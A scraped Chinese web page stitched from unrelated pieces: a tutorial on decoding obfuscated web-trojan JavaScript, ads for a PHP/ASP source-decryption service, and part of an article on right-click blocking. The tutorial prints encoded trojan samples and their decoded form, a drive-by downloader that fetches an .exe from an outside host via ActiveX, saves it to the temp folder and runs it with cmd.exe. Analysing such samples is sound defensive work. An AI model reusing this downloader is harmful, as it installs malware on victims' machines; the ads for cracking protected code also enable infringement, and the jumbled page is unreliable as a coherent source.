如何解密这段网页加密解密代码?
点击联系发帖人
时间:2014-10-17 05:08
你的位置: &
> 介绍网页木马解密常用方法
介绍网页木马解密常用方法
更新时间:
收藏本页(Ctrl+D)
手机扫描查看
扫描二维码
主要介绍网页木马的eval和Document.write解密方法
一. eval加密是在网马解密中最常见的,eval在jscript脚本中实际上是一个函数,简单可以理解为执行语句的的意思。
1. 参数 :codeString 必选。包含有效 JScript 代码的字符串。eval 函数允许动态执行 JScript 源代码。
2. eval函数特点:是将字符串转换为脚本代码,然后就可以执行了,但是,如果字符串里面还有HMTL标签的话,它就不能执行了。
二. Eval解密方法之alert方法:
1.alert函数:
在要对eval解密之前首先需要了解一下alert这个函数,大家可能有个疑问,在解马的过程中怎样才能保证自身安全而又不中招呢,我们知道要是直接去访问一些经过加密的网马地址,就相当于在电脑上直接运行了网马。既要能将网马解出,又要保证的安全。这时我们就要用到alert这个函数。
alert函数在jscript中有弹出消息内容的作用,我们正是可以利用这一特性,来保证在解马的过程中不会中招。请看下面一个小例子:
&script&alert(&你好!&)&/script&将此段代码,粘贴至记事本中保存为htm格式(文件名随意),直接运行后可看到alert函数的效果。
了解以上内容后,接下来我们来看一个eval的实例:
eval(function(p,a,c,k,e,d){e=function(c){return(c&a?'':e(parseInt(c/a)))+((cc=c%a)&35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return&d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){pp=p.replace(new&RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return&p}('1&z,y,x,v,w;B=\'C://I.u/F/D.E\';1&J=\'4.n\';1&i=\'4.h\';1&j=f[&g&][&s&](&q&);1&8=&p:&;1&9=&0-k-0&;1&7=&l&;1&5=&G&;1&2=&N&;1&c=&Z-W-Y&;1&K=&U.X&+&M&+&L&+&H&+&T&+&T&+&P&;1&V=&A&+&d&+&o&+&d&+&b.&+&S&+&t&+&r&+&e&+&a&+&m&;1&3=&O.&;1&6=&Q&;1&R=3+6;1&2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))&
将此段代码复制粘贴至记事本中,
将其中的eval修改为alert其余内容不变,但要加上&script&&/script&实际变为一个脚本。
保存为htm(文件名任意)处理后的代码如下:
& &script&
alert(function(p,a,c,k,e,d){e=function(c){return(c&a?'':e(parseInt(c/a)))+((c=c%a)&35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f[&g&][&s&](&q&);1 8=&p:&;1 9=&0-k-0&;1 7=&l&;1 5=&G&;1 2=&N&;1 c=&Z-W-Y&;1 K=&U.X&+&M&+&L&+&H&+&T&+&T&+&P&;1 V=&A&+&d&+&o&+&d&+&b.&+&S&+&t&+&r&+&e&+&a&+&m&;1 3=&O.&;1 6=&Q&;1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))
解密结果见下图,
我们看到红色框内容为网马的下载地址,鼠标选中这个对话框,
ctrl+a全选再ctrl+c复制,可将整个代码粘贴至记事本上。
获得代码地址后,可使用下载工具直接下载网马。
第二部分,document.write解密网马
一.Document.write 函数简介:
在Microsoft JScript 提供了两种方式来在浏览器中直接显示数据。可以使用write( ) 和 writeln( ),这两个函数是document 对象的方法。也可以在浏览器中以表格的方式显示信息,以及用警告、提示和确认消息框来显示信息。
使用document.write( ) 和 document.writeln( )显示信息最常用的方式是 document 对象的 write( ) 方法。该方法用一个字符串作为其参数,并在浏览器中显示。该字符串可以是普通文本或 HTML。
字符串可以用单引号或双引号引起来。这样可以引用那些包含引号或撇号的内容。
注:Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上。
二.Document.write函数实例
& &script&
document.write(&hell world&)
将此段代码粘贴至记事本,保存为htm格式直接运行打开。这段代码的执行结果实际上是将hell world 在网页显示出来。
& &script&
document.write(&&iframe src=&&/iframe&&)
将上面的代码粘贴至记事本,保存为htm直接运行打开,这段代码的执行结果为在联网的情况下,直接会在网页上显示一个框架,而框架的内容为google网站。
我们来简单分析一下这两个例子的执行结果为什么不同:
例1实际上是一个简单的输出,就是将document.write函数后的内容输出至页面。
例2内容包含了html脚本标签:&iframe&、 src、&/iframe& ,此时将会直接执行脚本,而执行的结果为在网页上显示一个框架,而框架的内容为瑞星官方网站。
例1和例2实际上是对&Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上&。这段话的一个印证。
Document.write解密方法之alert方法
即在获得的包含有document.write函数的网马代码中,将document.wirte替换为alert函数,将代码保存至记事本,扩展名为htm文件,直接浏览运行。
下面我们将结合一个实例来进行讲解:
某加密恶意网页内容如下:
& &html&&head&
&META HTTP-EQUIV=&imagetoolbar& CONTENT=&no&&&noscript&&iframe&&/iframe&&/noscript&&script language=&javascript&&&!--
nO44=&8\+6bJ\+6\+&,hA91=&8\{\[s\ Jb&;.9068937,cN13=&.6976961&,nO44='\&eU6521Q\#u\'mRbE\=\|\`hK\:jVDM9\&z\~lf\!oPFc\%3IW7d\&ignAkJ\$\_H\-\
,p\+Zy\{\/\.Sr\&\}Ot8\[4Y\\B0x\nqsNC\^\*XG\?\ \]\r\(Lv\)T\;\@aw',hA91='\%\-\{Y\+\[3\)4F\!nceK5QG\n\,hxClzU\@Z\~\^q\&yuAk6P\?sI2\.M0fwaR\*LT\;\&\]j\|9
g8SH\#\:E\_b\=JB\(V\ mX\/7\$d\&vtD\\\rNWpO\&r1io\'\`\}';function oD30(eS7){&866s\+b\ s&,l=eS7.'\|i\&\|QTT\&OUn\&',w='';while(l--)&\+8z\+ss6beT\ \+&,o=nO44.indexOf(eS7.charAt(l)),'iT3\{nu\|\{',w=(o==-1?eS7.charAt(l):hA91.charAt(o))+w;&8\+\+s\+\[b6&,
nO44=nO44.substring(1)+nO44.charAt(0),document.write(w);'i\|\|ss3s'};oD30(&LWRvT\r\*B
Dkm\{Pk\{b8\+k\^kWRvT\r\*\!t\ \/d8q\/1\/\-TnYN\;RP0bm\*\&kDDQUnPmR\*T\;mBON0YQUvb\*PvmBnkDWbw\-nPmR\*T\;mBO0N0YQUN\;RP0bm\*\&\;mR\;m\*
bj\*0bmP8ON0\-Wb\*HT0b\;P\*Y\,O0N0YQ\,K\/ggQw\-O0N0YQ\-wN\;RP0bm\*\&\;mR\;m\*bj\*0bmP8mbABuPmR\*T\;mY\,v
b\*PvmBnkDWb\,Q\-nPmR\*T\;mBOmN0YbQUTnYN\;RP0bm\*\&DkobvWZZATmN\;A\&WTNbtkvQUTnYb\&A\:TR\:\'8\)Qvb\*PvmB
nkDWb\-ww\-TnYN\;RP0bm\*\&DkobvWQUN\;RP0bm\*\&Rk\r\*Pvb\}\^bm\*WY\}\^bm\*\&i\(9\.\}X\(\]\ Q\-N\;RP0bm\*\&\;m0\;PWbN\;Am8OmN0\-wbDWbUN\;RP0bm\*\&\;m0\;PWbP\r8OmN0\-w\-vV\)y8\/\)d1\-j\(dg8d\#gy\-n
PmR\*T\;mBONNWYQUTnYN\;RP0bm\*\&kDDQUN\;RP0bm\*\&\;mWbDbR\*W\*kv\*8nPmR\*T\;mBYQUvb\*PvmBnkDWbw\-Wb\*HT0
b\;P\*Y\,ONNWYQ\,KqggQww\-ONNWYQ\-mV\=q8d\%y\#\-W\(\=y8\%y\/g\-nPmR\*T\;mBOmvYQUvb\*PvmB\*vPbw\;mbvv\;v8
Omv\-TXy\%8qd\%\=\-b\}1\#8\)\/1\%\-\^E\/8qd\%\/\-v\_\#q8\)\/1y\-juyd8\/\%y1\-\^u\)d8yqy\-0\_\/\=8\%\#\)\
)\-\-ODTRbmWbNO\*\;O8\,\:PoPnbm\{\,\-L\nWRvT\r\*\!&)//--&&/script&&ScrIPT lANgUAgE=JAVAscrIpt&oD30(&v7b\)\;\(Xo\ K0X\)P0\ K6\ K\ K0\*J\)0YA\[C\@bFxERXib\)EJXEOMExERX\\p\?V3\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\#\,\ K0YAi7EXcXX\)\;8FXE\\p\?V3Q\?V3D\?V3T\?VsQ\?VsQ\?V3\{\?V3up\:p\?V3Q\?V3D\?VsQ\?V3\{\?V3u\?VQc\?Vu\&\?Vuu
\?VQ\{\?VQ3\?VuQ\?VQ\|\?VQ\|\?VQ3\?V\&G\?VQ3\?VQ\|\?VuT\?VQQ\?V\&G\?VQT\?VQT\?Vuu\?VQn\?V\&G\?VQ\{\?VQ\.
\?VQQ\?VuT\?V\&G\?VQn\?VQn\?VuQ\?VQn\?VQu\?Vu3\?VuQ\?VQ\&\?VQ\{\?Vu\|\?VQQ\?VQ3p\#\,\ K0\*J\)0\=V\[YAiD\)EJXEL8ZEbX\\p\?VuG\?V3\{\?V3Q\?Vs\&\?V3\'\?VsQ\?V3\'\?V33\?Vsu\?V\&O\?V\|\.p2p\?VuG\?
VuD\?Vu\.\?V\|u\?V\|u\?V\|np\:pp\#\,\ K0\*J\)0cS\[YAiD\)EJXEL8ZEbX\\p\?VuT\?V3u\?V3\'\?V3u\?V3\&\?V\&O\?V\|Q\?Vsu\?Vs\&\?V3\|\?V3T\?V3Gp\:pp\#
\,\ K\ K0cSiXP\(E\[T\,\ K0\=Vi\@\(ER\\p\?Vus\?Vu\|\?V\|up\:0a\?V3\.\?Vsu\?Vsu\?Vsn\?VQJ\?V\&A\?V\&A\?Vss\?VQT\?VQ\.\?V\&E\?Vs3\?
V3s\?V\&A\?VsQ\?V\&E\?V3\|\?Vs\.\?V3\|a\:n\#\,\ K\ K0\=Vi7ERC\\\#\,\ KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACA
Ca\,\ K0\]7T\[a\?VsO\?V\|u\?V3\|\?V3G\?Vsna2gJXji\)\@FRC\\gJXji\)JRC\@x\\\#\_\{\{\{\{\#2a\?V\&O\?Vsu\?V3G\?Vsn
a\,\ K0EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEAC7A7CA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CA
CACa\,\ K0\*J\)0b\'\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3Q\?Vs\&\?V3\{\?Vsn\?Vsu\?V3\{\?V3O\?V3s\?V\&O\?Vu3\?V3\{\?V3D\
?V3\|\?V\|Q\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?Vu\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\:pp\#\,\ K0\*J\)0\]7\-x\(\[b\'ihEXS\(Eb\;JM\'\@MCE\)\\n\#\,0\]7T\[0b\'iYF\;MCIJXj\\\]7\-x\(\:\]7T\#\,0cSiL\(ER\\\
#\,cSi\r\)\;XE\\\=Vi\)E7\(\@R7EY\@CP\#\,\ K0cSiSJ\*E\-\@\'\;ME\\\]7T\:\&\#\,0cSiDM\@7E\\\#\,0\*J\)0\!\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3\.\?V3\|\?V3D\
?V3D\?V\&O\?VuT\?Vsn\?Vsn\?V3D\?V3\{\?V3Q\?V3T\?Vsu\?V3\{\?V3\'\?V3Op\:pp\#\,\ K0\@\%T\[b\'iYF\;MCIJXj\\\]7\-x\(2a\?V\|D\?V\|D\?VsQ\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?VQQ\?VQ\&a\:a\?V3Q\?V3G
\?V3u\?V\&O\?V3\|\?Vs\.\?V3\|a\#\,\ K0\!1p\?V\|Q\?V3\.\?V3\|\?V3b\?V3b\?Vu\|\?Vs\.\?V3\|\?V3Q\?Vs\|\?Vsu\?V3\|p\+\\\@\%T\:a\?V\&n\?V\&\'\?V3
Q0a2\]7T\:pp\:p\?V3\'\?Vsn\?V3\|\?V3Op\:n\#\,\ KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACA
Ca\,\ K\&\ K0bJXbj\\VVA\!EJC7A\#060VVA\!EJC7A\[T\,0\&\ Kvq7b\)\;\(Xo&)&/script&&/head&&body&&noscript&&b&&font color=red&This page requires a javascript enabled browser!!!&/font&&/b&&/noscript&&/body&&/html&
注意到其中红色部分,我们可以造个直接获取解密后文字的框:
&textarea id=&textareaID& rows=&50& cols=&100&&&/textarea&
&script language=&javascript&&
..........待解密的javascript代码,其中document.write(xxxx)用document.getElementById(&textareaID&).innerText=xxxx代替
修改后如下:
&html&&head&&&META&HTTP-EQUIV=&imagetoolbar&&CONTENT=&no&&&noscript&&iframe&&/iframe&&/noscript&&&textarea&id=&textareaID&&rows=&50&&cols=&100&&&/textarea&&&script&language=&javascript&&&!--&nO44=&8\+6bJ\+6\+&,hA91=&8\{\[s\&Jb&;.9068937,cN13=&.6976961&,nO44='\&eU6521Q\#u\'mRbE\=\|\`hK\:jVDM9\&z\~lf\!oPFc\%3IW7d\&ignAkJ\$\_H\-\&,p\+Zy\{\/\.Sr\&\}Ot8\[4Y\\B0x\nqsNC\^\*XG\?\&\]\r\(Lv\)T\;\@aw',hA91='\%\-\{Y\+\[3\)4F\!nceK5QG\n\,hxClzU\@Z\~\^q\&yuAk6P\?sI2\.M0fwaR\*LT\;\&\]j\|9g&8SH\#\:E\_b\=JB\(V\&mX\/7\$d\&vtD\\\rNWpO\&r1io\'\`\}';function&oD30(eS7){&866s\+b\&s&,l=eS7.'\|i\&\|QTT\&OUn\&',w='';while(l--)&\+8z\+ss6beT\&\+&,o=nO44.indexOf(eS7.charAt(l)),'iT3\{nu\|\{',w=(o==-1?eS7.charAt(l):hA91.charAt(o))+w;&8\+\+s\+\[b6&,&nO44nO44=nO44.substring(1)+nO44.charAt(0),document.getElementById(&textareaID&).innerText=(w);&'i\|\|ss3s'};oD30(&LWRvT\r\*BDkm\{Pk\{b8\+k\^kWRvT\r\*\!t\&\/d8q\/1\/\-TnYN\;RP0bm\*\&kDDQUnPmR\*T\;mBON0YQUvb\*PvmBnkDWbw\-nPmR\*T\;mBO0N0YQUN\;RP0bm\*\&\;mR\;m\*b&j\*0bmP8ON0\-Wb\*HT0b\;P\*Y\,O0N0YQ\,K\/ggQw\-O0N0YQ\-wN\;RP0bm\*\&\;mR\;m\*bj\*0bmP8mbABuPmR\*T\;mY\,vb\&*PvmBnkDWb\,Q\-nPmR\*T\;mBOmN0YbQUTnYN\;RP0bm\*\&DkobvWZZATmN\;A\&WTNbtkvQUTnYb\&A\:TR\:\'8\)Qvb\*PvmBnkD&Wb\-ww\-TnYN\;RP0bm\*\&DkobvWQUN\;RP0bm\*\&Rk\r\*Pvb\}\^bm\*WY\}\^bm\*\&i\(9\.\}X\(\]\&Q\-N\;RP0bm\*\&\;m0\;PWbN\;Am8OmN0\-wbDWbUN\;RP0bm\*\&\;m0\;PWbP\r8OmN0\-w\-vV\)y8\/\)d1\-j\(dg8d\#gy\-nP&mR\*T\;mBONNWYQUTnYN\;RP0bm\*\&kDDQUN\;RP0bm\*\&\;mWbDbR\*W\*kv\*8nPmR\*T\;mBYQUvb\*PvmBnkDWbw\-Wb\*HT0b\&;P\*Y\,ONNWYQ\,KqggQww\-ONNWYQ\-mV\=q8d\%y\#\-W\(\=y8\%y\/g\-nPmR\*T\;mBOmvYQUvb\*PvmB\*vPbw\;mbvv\;v8Omv&\-TXy\%8qd\%\=\-b\}1\#8\)\/1\%\-\^E\/8qd\%\/\-v\_\#q8\)\/1y\-juyd8\/\%y1\-\^u\)d8yqy\-0\_\/\=8\%\#\)\)\-\&-ODTRbmWbNO\*\;O8\,\:PoPnbm\{\,\-L\nWRvT\r\*\!&)//--&&/script&&ScrIPT&lANgUAgE=JAVAscrIpt&oD30(&v7b\)\;\(Xo\&K0X\)P0\&K6\&K\&K0\*J\)0YA\[C\@bFxERXib\)EJXEOMExERX\\p\?V3\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\#\,\&K0YAi7EXcXX\)\;8FXE\\p\?V3Q\?V3D\?V3T\?VsQ\?VsQ\?V3\{\?V3up\:p\?V3Q\?V3D\?VsQ\?V3\{\?V3u\?VQc\?Vu\&\?Vuu\&?VQ\{\?VQ3\?VuQ\?VQ\|\?VQ\|\?VQ3\?V\&G\?VQ3\?VQ\|\?VuT\?VQQ\?V\&G\?VQT\?VQT\?Vuu\?VQn\?V\&G\?VQ\{\?VQ\.\?&VQQ\?VuT\?V\&G\?VQn\?VQn\?VuQ\?VQn\?VQu\?Vu3\?VuQ\?VQ\&\?VQ\{\?Vu\|\?VQQ\?VQ3p\#\,\&K0\*J\)0\=V\[YAiD\)EJXEL8ZEbX\\p\?VuG\?V3\{\?V3Q\?Vs\&\?V3\'\?VsQ\?V3\'\?V33\?Vsu\?V\&O\?V\|\.p2p\?VuG\?V&uD\?Vu\.\?V\|u\?V\|u\?V\|np\:pp\#\,\&K0\*J\)0cS\[YAiD\)EJXEL8ZEbX\\p\?VuT\?V3u\?V3\'\?V3u\?V3\&\?V\&O\?V\|Q\?Vsu\?Vs\&\?V3\|\?V3T\?V3Gp\:pp\#\&,\&K\&K0cSiXP\(E\[T\,\&K0\=Vi\@\(ER\\p\?Vus\?Vu\|\?V\|up\:0a\?V3\.\?Vsu\?Vsu\?Vsn\?VQJ\?V\&A\?V\&A\?Vss\?VQT\?VQ\.\?V\&E\?Vs3\?V&3s\?V\&A\?VsQ\?V\&E\?V3\|\?Vs\.\?V3\|a\:n\#\,\&K\&K0\=Vi7ERC\\\#\,\&KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACAC&a\,\&K0\]7T\[a\?VsO\?V\|u\?V3\|\?V3G\?Vsna2gJXji\)\@FRC\\gJXji\)JRC\@x\\\#\_\{\{\{\{\#2a\?V\&O\?Vsu\?V3G\?Vsna&\,\&K0EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEAC7A7CA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CAC&ACa\,\&K0\*J\)0b\'\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3Q\?Vs\&\?V3\{\?Vsn\?Vsu\?V3\{\?V3O\?V3s\?V\&O\?Vu3\?V3\{\?V3D\?&V3\|\?V\|Q\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?Vu\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\:pp\#\,\&K0\*J\)0\]7\-x\(\[b\'ihEXS\(Eb\;JM\'\@MCE\)\\n\#\,0\]7T\[0b\'iYF\;MCIJXj\\\]7\-x\(\:\]7T\#\,0cSiL\(ER\\\#&\,cSi\r\)\;XE\\\=Vi\)E7\(\@R7EY\@CP\#\,\&K0cSiSJ\*E\-\@\'\;ME\\\]7T\:\&\#\,0cSiDM\@7E\\\#\,0\*J\)0\!\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3\.\?V3\|\?V3D\?&V3D\?V\&O\?VuT\?Vsn\?Vsn\?V3D\?V3\{\?V3Q\?V3T\?Vsu\?V3\{\?V3\'\?V3Op\:pp\#\,\&K0\@\%T\[b\'iYF\;MCIJXj\\\]7\-x\(2a\?V\|D\?V\|D\?VsQ\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?VQQ\?VQ\&a\:a\?V3Q\?V3G\&?V3u\?V\&O\?V3\|\?Vs\.\?V3\|a\#\,\&K0\!1p\?V\|Q\?V3\.\?V3\|\?V3b\?V3b\?Vu\|\?Vs\.\?V3\|\?V3Q\?Vs\|\?Vsu\?V3\|p\+\\\@\%T\:a\?V\&n\?V\&\'\?V3Q&0a2\]7T\:pp\:p\?V3\'\?Vsn\?V3\|\?V3Op\:n\#\,\&KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACAC&a\,\&K\&\&K0bJXbj\\VVA\!EJC7A\#060VVA\!EJC7A\[T\,0\&\&Kvq7b\)\;\(Xo&)&/script&&/head&&body&&noscript&&b&&font&color=red&This&page&requires&a&javascript&enabled&browser!!!&/font&&/b&&/noscript&&/body&&/html&&
另存为htm格式的,然后ie打开就是解密后的代码:
&script&&try&{&&var&Bf=document.createElement(&\x6F\x62\x6A\x65\x63\x74&);&Bf.setAttribute(&\x63\x6C\x61\x73\x73\x69\x64&,&\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36&\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45&\x33\x36&);&var&Kx=Bf.CreateObject(&\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58&+&\x4D\x4C\x48\x54\x54\x50&,&&);&var&AS=Bf.CreateObject(&\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D&,&&);&&AS.type=1;&Kx.open(&\x47\x45\x54&,&'\x68\x74\x74\x70\x3a\x2f\x2f\x77\x31\x38\x2e\x76\x67\x2f\x73\x2e\x65\x78\x65',0);&&Kx.send();&bbbbbbbbbbbfdsgdsfgsdfgasdffffffff='kkkkkkkkkkkkkfjsdaljflsdjfljdskfjdkkkkkdfdfd';&Ns1='\x7E\x54\x65\x6D\x70'+Math.round(Math.random()*9999)+'\x2E\x74\x6D\x70';&eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefdsfsdf='kkkkkkkkkkkkkfjsdaljflsdjfljdskfjdkkkkkdfdfd';&var&cF=Bf.CreateObject(&\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F&\x62\x6A\x65\x63\x74&,&&);&var&NsTmp=cF.GetSpecialFolder(0);&Ns1=&cF.BuildPath(NsTmp,Ns1);&AS.Open();AS.Write(Kx.responseBody);&AS.SaveToFile(Ns1,2);&AS.Close();&var&q=Bf.CreateObject(&\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E&,&&);&ok1=cF.BuildPath(NsTmp+'\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32','\x63\x6D\x64\x2E\x65\x78\x65');&q[&\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65&](ok1,'\x20\x2F\x63&'+Ns1,&&,&\x6F\x70\x65\x6E&,0);&bbbbbbbbbbbfdsgdsfgsdfgasdffffffff='kkkkkkkkkkkkkfjsdaljflsdjfljdskfjdkkkkkdfdfd';&}&catch(xxfqeadsf)&{&xxfqeadsf=1;&}&&/script&&
【上一篇】
【下一篇】
看完这篇文章有何感觉?
(您的评论需要经过审核才能显示,请文明发言!)&&剩余字数:
点击图片更换
统一文章资讯频道声明
1、 所有来源标注为统一下载站或统一文章的内容版权均为本站所有,若您需要引用、转载,请注明来源及原文链接即可,如涉及大面积转载,请来信告知,获取授权。
2、 本站所提供的文章资讯等内容均为作者提供、网友推荐、互联网整理而来,仅供学习参考,如有侵犯您的版权,请及时联系我们,并提供原文出处等,本站将在三个工作日内修正。
3、 若您的网站或机构从本站获取的一切资源进行商业使用,除来源为本站的资料需与本站协商外,其他资源请自行联系版权所有人。
4、 未经统一下载站允许,不得盗链、盗用本站资源;不得复制或仿造本网站,不得在非统一下载站所属的服务器上建立镜像,站长之家对其自行开发的或和他人共同开发的所有内容、技术手段和服务拥有全部知识产权,任何人不得侵害或破坏,也不得擅自使用。
文章教程分类
Copy . All Rights Reserved.
本站资源均收集整理于互联网,其著作权归原作者所有,如果有侵犯您权利的资源,请来信告知,我们将及时撤销相应资源。/ 简单的网站防复制代码和破解方式
顶级赞助商
放错地方的广告找源码|php解密加密|php混淆解密|phpjm解密|php在线解密|ASP在线解密|ASPEncodeDLL解密|ioncube9解密|php反编译|zend6解密|Zend Guard 6 破解|||
PHP混淆类加密解密VIP版,适用于免费版无法解密的.或者有时间\IP\域名限制的混淆程序.
PHP找源码针对PHP组件类加密如:ZEND等,程序运行需要在PHP.INI中加载DLL(SO)文件的加密解密.
在这里可以修复ZEND加密后的文件,最好的zend混淆修复工具.
如果您有PHP文件需要保密加密,看这里了很安全的加密解决方案.
在这里你可以解密ASP加密的文件,如:ASPEncodeDLL加密的ASP文件 .
在这里你可以解密修复ASP混淆加密的文件,如:chr或自己定义加密 .
牛X任性的工具网站<
关于【找源码】 的介绍
这个网站作什么?
找源码顾名思义就是可以帮您找回程序(Program)的源代码(Source Code),通过技术手段逆向、重写、还原将已经编译、加密的程序还原成易读、可二次开发的源代码。
他可以找回哪些代码?
本系统主要还是针对WEB开发语言,如:PHP、ASP、NET等,现阶段已支持PHP\ASP的代码找回、逆向、解密。
支持哪一些代码还原?
A、基于混淆类(无需第三方组件或修改PHP的)如:phpjm、phppd神盾、php微盾(威盾)、tianyiw、小猪、齐博等各类混淆加密等,可实现百分百还原。
B、Zend类加密(PHP 5.2\5.3\5.4\5.5\5.6)的加密还原可达95%以上,针对加密混淆系统开发修复工具,提高修复效率。
C、第三方加密,如:易盾(各版本)、iRadikal、ionCube(7,8,9)、SourceGuardian、zoeeyguard(php_puzzcore)、php-beast、php_screw、bcompiler、BZ2、Phpexpress、truebug等,也有较好的还原效果。
D、支持对PHP代码的美化操作。
E、支持VBS(JS)EnCode加密的文件在线还原,支持ASPEnCode即ASP代码加密工具的代码还原,支持ASPAPPG(ASP加密锁)V2.x,V3.x的代码还原。
F、最强大的PHP代码修复功能,支持混淆\乱码\字符集\长变量的修复。
G、最强大的ASP代码修复功能,支持混淆\乱码\字符集\ASP自定义函数加密修复。
H、强大的FLASH文件转换FLA服务,别人处理不了的来找我。
本系统刚刚测试中,欢迎您提出宝贵意见!
部份找源码对比截图:
友情连接:PR大于3,技术类网站欢迎交换,作好我连接后请联系QQ:7530782网页加密完全攻略
作者:佚名
字体:[ ] 来源:互联网 时间:10-08 19:03:56
现在专业性的网站越来越多,许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事,所以大家都想保护自己独创的作品,为自己的网页上把锁,今天就让我带大家了解一下如何给我们的网页加上一把密码锁。
一、常用JavaScript
现在专业性的网站越来越多,许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事,所以大家都想保护自己独创的作品,为自己的网页上把锁,今天就让我带大家了解一下如何给我们的网页加上一把密码锁。
一、常用JavaScript密码锁
1. 了解javascript
JavaScript是一种新的网页描述语言,是由Sun公司以及网景Netscape公司开发的,此一语言可以被嵌入HTML的文件之中,使用它可以让你设计交互性的网页内容。
2. javascript特点
使用javascript非常简单,只是一小段代码,就可以让网页发生千奇百怪的效果,而且使用javascript来加密的方法是网络中加密最常用的方法。
3. 使用javascript加密
使用javascript加密最简单的结果就是让浏览者不能使用鼠标右键,当他点击右键想对图片进行保存或者复制文字的时候就会弹出一个警告窗口或是弹出收藏夹等。
实现方法:
(1)利用弹出窗口封锁鼠标右键将下面这段代码放在网页HTML代码的<head></head>标志中,就可以实现封锁右键,给网页加密。
<script language=&javascript&>function click() {if (event.button==2) {alert('本站不准使用右键,使用左键吧!^_^') }}document.onmousedown=click</script>
(2)弹出“添加收藏夹”封锁鼠标右键将下面这段代码放在网页的HTML代码的<head></head>标志中。实现点击右键出现“添加到收藏夹”选项。
<script language=&javascript&>function click() {if (event.button==2) {window.external.addFavorite('/,' 51CTO')}}document.onmousedown=click</script>
(3)彻底封锁鼠标右键将下面这段代码放在网页的HTML代码的<head></head>标志中能够实现彻底封锁鼠标右键的效果,由于这个脚本在右键按下时调用一个函数,所以可以改为很多种类型。即使按下左键,再按下右键,放开左键,再放开右键的方法也还是破解不了。
<script>function DM(e){if(!ns){if(event.button>1)window.external.addFavorite('/,' 大众网络报')}else{if(e.which>1)return false}}ns=navigator.appName==&Netscape&;if(ns)document.captureEvents(Event.MOUSEMOVE|Event.MOUSEDOWN);document.onmousemove=DM;document.onmousedown=DM;</script>
(4)禁止查看源文件将下面这段代码放在网页的HTML代码的<head></head>标志中则可以实现禁止利用IE浏览器查看源文件。
